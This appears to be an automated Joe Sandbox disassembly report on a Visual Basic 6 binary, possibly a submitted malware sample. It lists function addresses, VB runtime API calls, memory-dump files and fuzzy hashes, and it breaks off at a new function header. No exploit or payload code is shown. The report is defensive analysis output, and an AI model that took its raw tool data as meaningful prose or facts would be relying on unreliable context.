0x004585ea
0x004585f0
0x004585f3
0x004585f6
0x004585f7
0x004585f9
0x004585fb
0x004585fe
0x00458604
0x00458606
0x00458609
0x0045860e
0x00458610
0x00458613
0x00458614
0x00458616
0x00458618
0x0045861e
0x00458624
0x0045862a
0x00458637
0x00458641
0x00458647
0x0045864d
0x00458639
0x00458639
0x00458639
0x00458652
0x00458655
0x00458659
0x00401e9c
0x0045865f
0x0045865f
0x00458665
0x0045866b
0x0045866f
0x00458677
0x0045867c
0x00458682
0x00458685
0x00458687
0x0045868d
0x00458694
0x00000000
0x00458694
0x00458659
0x0045869f
0x004586a4
0x004586aa
0x004586ad
0x004586b0
0x004586b0
0x004586b3
0x004586b6
0x004586b9
0x004586ba
0x004586ba
0x004586ba
0x004586bc
0x004586c1
0x004586c7
0x004586cc
0x004586d2
0x004586d4
0x004586d7
0x004586da
0x004586dd
0x004586e0
0x004586e3
0x004586e6
0x004586e8
0x004586eb
0x004586f1
0x004586f6
0x004586f9
0x004586ff
0x00458702
0x00458704
0x0045870a
0x00458711
0x00458711
0x0045871c
0x0045871f
0x00458724
0x00458726
0x0045872b
0x0045872d
0x00458730
0x00458733
0x00458735
0x00458738
0x0045873b
0x0045873e
0x00458744
0x00458749
0x0045874c
0x00458752
0x00458757
0x0045875a
0x00458760
0x00458767
0x0045876a
0x0045876c
0x00458774
0x00458776
0x00458784
0x00458784
0x0045878a
0x0045878d
0x0045878f
0x00458796
0x00458797
0x00000000

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 004583CC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 004583F3
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00458412
__vbaFreeObj.MSVBVM60 ref: 00458421
__vbaObjSet.MSVBVM60(?,00000000), ref: 00458431
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 00458458
__vbaSetSystemError.MSVBVM60(?,00000001,00000000), ref: 00458478
__vbaFreeObj.MSVBVM60 ref: 00458487
__vbaObjSet.MSVBVM60(?,00000000), ref: 00458497
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 004584BE
__vbaSetSystemError.MSVBVM60(?,-00000001,00000000), ref: 004584DE
__vbaFreeObj.MSVBVM60 ref: 004584ED
__vbaObjSet.MSVBVM60(?,00000000), ref: 004584FD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 00458524
__vbaSetSystemError.MSVBVM60(?,00000000,00000001), ref: 00458544
__vbaFreeObj.MSVBVM60 ref: 00458553
__vbaObjSet.MSVBVM60(?,00000000), ref: 00458563
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 0045858A
__vbaSetSystemError.MSVBVM60(?,00000000,-00000001), ref: 004585AA
__vbaFreeObj.MSVBVM60 ref: 004585B3
__vbaObjSet.MSVBVM60(?,00000000), ref: 004585C3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,000000E0), ref: 004585EA
_adj_fdiv_m64.MSVBVM60 ref: 0045864D
__vbaFpI4.MSVBVM60 ref: 0045865F
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 0045867C
__vbaFreeObj.MSVBVM60 ref: 00458685
__vbaObjSet.MSVBVM60(?,00000000), ref: 004586F6
__vbaLateIdSt.MSVBVM60(00000000), ref: 004586F9
__vbaFreeObj.MSVBVM60 ref: 00458702
__vbaObjSet.MSVBVM60(?,00000000), ref: 00458749
__vbaLateIdSt.MSVBVM60(00000000), ref: 0045874C
__vbaFreeObj.MSVBVM60 ref: 00458755
__vbaObjSet.MSVBVM60(?,00000000), ref: 00458765
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00458784
__vbaFreeObj.MSVBVM60 ref: 0045878D

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ErrorSystem$LateNew2$List_adj_fdiv_m64
String ID:
API String ID: 856715139-0
Opcode ID: ff3c88a18e2a414394d04b5bb3c1e3badab50049413a571992a512e1ab84e725
Instruction ID: e1cf2fe357018fd9683d4a19150513910815309c9c05eeff859b230ba4141957
Opcode Fuzzy Hash: ff3c88a18e2a414394d04b5bb3c1e3badab50049413a571992a512e1ab84e725
Instruction Fuzzy Hash: 33E13C74A00209DFDB04DFE9CD88AAEB7B8FF49700F10852AE845B72A5DB749945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00453230, Relevance: 52.9, APIs: 35, Instructions: 362COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

#593.MSVBVM60(?), ref: 004532E8
__vbaR8IntI2.MSVBVM60 ref: 0045330A
__vbaFreeVar.MSVBVM60 ref: 00453312
#593.MSVBVM60(0000000A), ref: 0045332A
__vbaR8IntI2.MSVBVM60 ref: 00453346
__vbaFreeVar.MSVBVM60 ref: 0045334E
#593.MSVBVM60(0000000A), ref: 00453366
__vbaR8IntI2.MSVBVM60 ref: 00453382
__vbaFreeVar.MSVBVM60 ref: 0045338A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045339E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 004533C1
__vbaSetSystemError.MSVBVM60(?,00000000,?), ref: 004533E6
__vbaFreeObj.MSVBVM60 ref: 004533F2
__vbaObjSet.MSVBVM60(?,00000000), ref: 00453406
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00453429
__vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0045344E
__vbaFreeObj.MSVBVM60 ref: 0045345A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045346E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00453491
__vbaSetSystemError.MSVBVM60(?,?), ref: 004534B9
__vbaFreeObj.MSVBVM60 ref: 004534C2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045353C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 0045355F
#588.MSVBVM60(00000000,00000000,00000000), ref: 0045357C
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 0045359A
__vbaFreeObj.MSVBVM60 ref: 004535A3
__vbaObjSet.MSVBVM60(?,00000000), ref: 00453616
__vbaLateIdSt.MSVBVM60(00000000), ref: 00453619
__vbaFreeObj.MSVBVM60 ref: 00453622
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045364E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 0045366D
__vbaFreeObj.MSVBVM60 ref: 0045367C
__vbaObjSet.MSVBVM60(?,00000000), ref: 004536AB
__vbaLateIdSt.MSVBVM60(00000000), ref: 004536AE
__vbaFreeObj.MSVBVM60 ref: 004536B7

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ErrorSystem$#593$LateNew2$#588List
String ID:
API String ID: 4274035602-0
Opcode ID: f3dd4d286099129cc3ce1212edca133d2be678ab5368e3757d5cadf6fea7b351
Instruction ID: 98c87bcc44dba3331fd2bc609ad089c7ae1e4d533c2d00e069e9f35d39cba909
Opcode Fuzzy Hash: f3dd4d286099129cc3ce1212edca133d2be678ab5368e3757d5cadf6fea7b351
Instruction Fuzzy Hash: E9D18074A00205EFDB04DFA4DD88AAEB7B8FF48701F148129F845E72A1E7749945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00461D90, Relevance: 51.3, APIs: 34, Instructions: 288COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461DD7
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461DF6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098C8,000000BC,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461E1C
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461E29
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461E42
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461E5B
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461E72
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461E8B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000080,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461EB2
__vbaFpI2.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461EC9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098C8,000000A4,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461EE9
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461EF5
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461F11
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461F30
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098B8,000000BC,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461F51
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461F56
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461F6F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461F88
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461F9F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461FB8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000088,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461FDF
__vbaFpI2.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461FF6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098B8,000000A4,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00462016
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00462022
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046203E
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00462057
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000080), ref: 0046207E
__vbaFpI4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00462089
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00462093
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 004620AC
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 004620C5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000088), ref: 004620EC
__vbaFpI4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 004620F1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 004620FB

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresultNew2$Free$List
String ID:
API String ID: 191279167-0
Opcode ID: 3e63a0592c6155e14fd258bba729c92b571fbaec750d71a330df6f96c32a1b40
Instruction ID: a20f19bd96b8b6bd85e7cedb39e58858e1668fec4d72829dab02a093e715dca7
Opcode Fuzzy Hash: 3e63a0592c6155e14fd258bba729c92b571fbaec750d71a330df6f96c32a1b40
Instruction Fuzzy Hash: BCA16C74600205EBD7109FA4CD89FBB77B8FF48745B104439F981F72A1E7B8A8058B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00461960, Relevance: 48.3, APIs: 32, Instructions: 310COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,00409CAC,00000000,?,66107570,00000000), ref: 004619A4

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaFpI4.MSVBVM60(?,66107570,00000000), ref: 004619F1
__vbaFpI4.MSVBVM60(?,66107570,00000000), ref: 00461A1F
__vbaNew2.MSVBVM60(00405960,0046C010), ref: 00461A58
__vbaObjSet.MSVBVM60(?,00000000,?,66107570,00000000), ref: 00461A71
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00461A94
#583.MSVBVM60(?,?,?,66107570,00000000), ref: 00461AAB
__vbaNew2.MSVBVM60(00405960,0046C010), ref: 00461AC7
__vbaObjSet.MSVBVM60(?,00000000,?,66107570,00000000), ref: 00461AE0
#582.MSVBVM60(?,?,?,66107570,00000000), ref: 00461AFE
_adj_fdiv_m64.MSVBVM60(?,66107570,00000000), ref: 00461B27
__vbaFpI4.MSVBVM60(?,66107570,00000000), ref: 00461B47
_adj_fdiv_m64.MSVBVM60(?,66107570,00000000), ref: 00461B6C
__vbaFpI4.MSVBVM60(00000000,?,66107570,00000000), ref: 00461B8E
__vbaSetSystemError.MSVBVM60(?,00000000,?,66107570,00000000), ref: 00461B9D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000006C), ref: 00461BC1
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,66107570,00000000), ref: 00461BD1
__vbaNew2.MSVBVM60(00405960,0046C010), ref: 00461BED
__vbaObjSet.MSVBVM60(?,00000000), ref: 00461C06
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00461C29
__vbaSetSystemError.MSVBVM60(?,?,00401E96,?), ref: 00461C4B
__vbaFreeObj.MSVBVM60 ref: 00461C54
__vbaNew2.MSVBVM60(00405960,0046C010), ref: 00461C6D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00461C86
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00461CA9
__vbaSetSystemError.MSVBVM60(?,?,00000003), ref: 00461CC1
__vbaFreeObj.MSVBVM60 ref: 00461CCA
__vbaNew2.MSVBVM60(00405960,0046C010,?,66107570,00000000), ref: 00461CFB
__vbaObjSet.MSVBVM60(?,00000000,?,66107570,00000000), ref: 00461D14
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264,?,66107570,00000000), ref: 00461D33
__vbaFreeObj.MSVBVM60(?,66107570,00000000), ref: 00461D3C
__vbaAryDestruct.MSVBVM60(00000000,?,00461D71,?,66107570,00000000), ref: 00461D6A

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresultNew2$Free$ErrorSystem$List_adj_fdiv_m64$#582#583Construct2Destruct
String ID:
API String ID: 3827546562-0
Opcode ID: 8296a4edcdc14e243b9aa5a6b7989491ede53b688b11cb373ff88f4b6ad8b13f
Instruction ID: 35179f1f9e762ac89f8fd6dbd2d56663f6449c7ed8d52642244a88e4c20046d0
Opcode Fuzzy Hash: 8296a4edcdc14e243b9aa5a6b7989491ede53b688b11cb373ff88f4b6ad8b13f
Instruction Fuzzy Hash: E1C15274A00208EFDB10DFA5DD88BAE7BB8FB48744F104569F485F32A0EB749945CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00459230, Relevance: 45.3, APIs: 30, Instructions: 326COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 004592D6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 004592FD
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0045931C
__vbaFreeObj.MSVBVM60 ref: 0045932B
_adj_fdiv_m64.MSVBVM60(?,?), ref: 004593C2
#585.MSVBVM60(?,?), ref: 004593D4
#582.MSVBVM60 ref: 004593E0
__vbaFpI4.MSVBVM60 ref: 00459404
_adj_fdiv_m64.MSVBVM60(?,?), ref: 00459437
#585.MSVBVM60(?,?), ref: 00459449
#582.MSVBVM60 ref: 00459455
__vbaFpI4.MSVBVM60 ref: 00459473
_adj_fdiv_m64.MSVBVM60(?,?), ref: 004594B8
#585.MSVBVM60(?,?), ref: 004594CA
#582.MSVBVM60 ref: 004594D6
__vbaFpI4.MSVBVM60 ref: 004594F4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00459509
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00459530
#588.MSVBVM60(00000000,00000000,00000000), ref: 0045954D
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 0045956A
__vbaFreeObj.MSVBVM60 ref: 00459573
__vbaObjSet.MSVBVM60(?,00000000), ref: 004595E4
__vbaLateIdSt.MSVBVM60(00000000), ref: 004595EB
__vbaFreeObj.MSVBVM60 ref: 004595F4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045961C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 0045963F
__vbaFreeObj.MSVBVM60 ref: 00459648
__vbaObjSet.MSVBVM60(?,00000000), ref: 00459677
__vbaLateIdSt.MSVBVM60(00000000), ref: 0045967E
__vbaFreeObj.MSVBVM60 ref: 00459687

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$#582#585_adj_fdiv_m64$ErrorLateNew2System$#588List
String ID:
API String ID: 2416979603-0
Opcode ID: 47d8be5ce637d1bf1a7560f176bdbe202cd93f481f9e322d26b4db20ca5b94ce
Instruction ID: f36309d356f5addedff2f5416220e7c6c71d170113238bdd7fb99988daeed569
Opcode Fuzzy Hash: 47d8be5ce637d1bf1a7560f176bdbe202cd93f481f9e322d26b4db20ca5b94ce
Instruction Fuzzy Hash: DDC19670900205DBDB04AFB5DD89ABDBBB4FF49305F10817AE885A32A1DB745885CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004679B0, Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

__vbaStrToAnsi.MSVBVM60(?), ref: 004679FC
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,?,?,00000001,00000000,00000000,00000002,00000000,00000000), ref: 00467A40
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,00000001,00000000,00000000,00000002,00000000,00000000), ref: 00467A4A
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000001,00000000,00000000,00000002,00000000,00000000), ref: 00467A56
__vbaLateMemCallLd.MSVBVM60(?,?,hdc,00000000,?,?,?,?,?,?,00000001,00000000,00000000,00000002,00000000,00000000), ref: 00467A6D
__vbaI4Var.MSVBVM60(?,00000000), ref: 00467A7B
__vbaSetSystemError.MSVBVM60(00000000), ref: 00467A8A
__vbaFreeVar.MSVBVM60 ref: 00467A8F
__vbaLateMemSt.MSVBVM60(?,CurrentX), ref: 00467AC9
__vbaLateMemSt.MSVBVM60(?,CurrentY), ref: 00467AF9
__vbaAryLock.MSVBVM60(?,005D5570), ref: 00467B06
__vbaAryUnlock.MSVBVM60(?,00401E96), ref: 00467B21
__vbaLateMemSt.MSVBVM60(?,ForeColor), ref: 00467B55
__vbaVarVargNofree.MSVBVM60 ref: 00467B5D
__vbaPrintObj.MSVBVM60(0040A710,?,00000000), ref: 00467B6C
__vbaLateMemCallLd.MSVBVM60(?,00000000,hdc,00000000,?,00000000), ref: 00467B80
__vbaI4Var.MSVBVM60(?,?), ref: 00467B91
__vbaSetSystemError.MSVBVM60(00000000), ref: 00467B9D
__vbaFreeVar.MSVBVM60 ref: 00467BA2
__vbaSetSystemError.MSVBVM60(?), ref: 00467BB1

Strings

CurrentY, xrefs: 00467AE5
pU], xrefs: 00467AFB
CurrentX, xrefs: 00467AB0
hdc, xrefs: 00467A61, 00467B76
ForeColor, xrefs: 00467B41

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Late$ErrorSystem$Free$Call$AnsiLockNofreePrintUnicodeUnlockVarg
String ID: CurrentX$CurrentY$ForeColor$hdc$pU]
API String ID: 3691811125-2575379563
Opcode ID: adba70183845b08b6610bd577fbec3330bb5fd50e1e009a39adcea579e9b5cb0
Instruction ID: 6ec353ec8dadaa1eea73bb723045f19bd0abd84160829f2f5294920ad7655759
Opcode Fuzzy Hash: adba70183845b08b6610bd577fbec3330bb5fd50e1e009a39adcea579e9b5cb0
Instruction Fuzzy Hash: 7B71ECB5900209AFDB04EFA8D984DAEBBB9FF88704F10856EF905A7350DB349941CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00456B90, Relevance: 40.8, APIs: 27, Instructions: 342COMMON

Download Yara Rule

APIs

